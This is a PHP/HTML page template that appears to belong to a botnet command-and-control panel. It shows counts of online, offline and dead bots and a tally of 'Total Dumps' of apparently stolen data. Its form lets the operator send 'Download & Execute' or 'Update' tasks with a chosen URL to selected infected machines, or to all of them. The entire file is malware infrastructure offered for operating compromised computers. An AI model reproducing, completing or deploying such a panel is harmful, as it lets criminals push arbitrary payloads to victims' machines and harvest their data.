<div id="content"><div id="left_content">
<div id="tblCMD">
<div id="tblHead"></div>
<div id="tblTitle"><center><b>COMMANDS LIST</b></center></div>
<div id="tblRow1"><ul><li>#ID </li> <li>Task Name </li><li>Command </li><li>Completed / Total </li><li>Actions </li></ul></div>
<?=TaskList();?>
<div id="tblPages"><div class="pagination"><ul><?=$_pagi_navegacion;?></ul></div></div>
<div id="tblEnd"></div>
</div>
</div><div id="right_content">
<div id="tblRight">
<div id="tblHead"></div>
<div id="tblTitle"><center><b>GENERAL STATISTICS</b></center></div>
<div id="tblRow2"><ul><li>Online Bots: <b><?=$onlineBots;?></b> </li><li>Offline Bots: <b><?=$offlineBots;?></b> </li><li>Total Bots: <b><?=$totalBots;?></b> </li><li>Online last 24hrs: <b><?=$hoursBots;?></b> </li><li>Probably Dead: <b><?=$deadBots;?></b> </li><li>Total Dumps: <b><?=$totalDumps;?></b> </li></ul></div>
<div id="tblEnd"></div>
</div><br />
<div id="tblRight">
<div id="tblHead"></div>
<div id="tblTitle"><center><b>ADD A NEW TASK</b></center></div>
<div id="tblRow4"><form method="POST" action="index.php?m=commands"><br><ul><li>Task Type: <select name="taskType" id="taskType"><option value="dlx">Download &amp; Execute</option><option value="upd">Update</option></select></li><li>Task Note: <input type="text" name="taskNote" value="<?=$note;?>"> </li><li>Task URL :  <input type="text" name="taskURL" value="<?=$url;?>"> (use http://)</li> <li>Task Limit: <input type="text" name="taskLimit" value="<?php if(isset($limit)) echo $limit; else echo '0'; ?>"> (0 for unlimited) </li><li>Task BotId:<input type="text" name="taskBotId" value="<?php if(isset($_GET['bid'])) echo clean($_GET['bid']); else echo $bots;?>"> ( "," for multiple ids) </li></ul>
<center><button type="submit" name="submit" value="add">Send Command</button></center></form></div>
<div id="tblEnd"></div>
</div>

</div></div>